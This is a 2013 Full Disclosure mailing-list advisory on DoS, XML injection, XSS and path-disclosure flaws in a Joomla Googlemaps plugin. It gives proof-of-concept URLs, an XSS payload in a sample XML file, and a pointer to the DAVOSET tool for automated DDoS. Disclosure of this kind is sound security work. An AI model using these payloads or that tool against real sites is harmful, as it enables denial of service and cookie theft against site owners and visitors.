Full Disclosure mailing list archives
Multiple vulnerabilities in Googlemaps plugin for Joomla
From: "MustLive" <mustlive () websecurity com ua>
Date: Tue, 16 Jul 2013 19:50:22 +0300
Hello list!These are Denial of Service, XML Injection, Cross-Site Scripting and Full path disclosure vulnerabilities in Googlemaps plugin for Joomla.
------------------------- Affected products: -------------------------Vulnerable are Googlemaps plugin for Joomla versions 2.x and 3.x and potentially previous versions. In new version of DAVOSET I'll add a lot of web sites with Googlemaps plugin.
------------------------- Affected vendors: ------------------------- Mike Reumer http://extensions.joomla.org/extensions/maps-a-weather/maps-a-locations/maps/1147 ---------- Details: ---------- Denial of Service (WASC-10): http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/large_fileBesides conducting DoS attack manually, it's also possible to conduct automated DoS and DDoS attacks with using of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html).
XML Injection (WASC-23): http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/xml.xmlIt's possible to include external xml-files. Which also can be used for XSS attack:
XSS via XML Injection (WASC-23): http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/xss.xml File xss.xml: <?xml version="1.0" encoding="utf-8"?> <feed> <title>XSS</title> <entry><div xmlns="http://www.w3.org/1999/xhtml"><script>alert(document.cookie)</script></div>
</entry> </feed> Cross-Site Scripting (WASC-08): http://site/plugins/content/plugin_googlemap2_proxy.php?url=%3Cbody%20onload=alert(document.cookie)%3E Full path disclosure (WASC-13): http://site/plugins/content/plugin_googlemap2_proxy.phpBesides plugin_googlemap2_proxy.php, also happens plugin_googlemap3_proxy.php (but it has other path at web sites).
Best wishes & regards, MustLive Administrator of Websecurity web sitehttp://websecurity.com.ua
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Multiple vulnerabilities in Googlemaps plugin for Joomla MustLive (Jul 16)
- Re: Multiple vulnerabilities in Googlemaps plugin for Joomla Źmicier Januszkiewicz (Jul 18)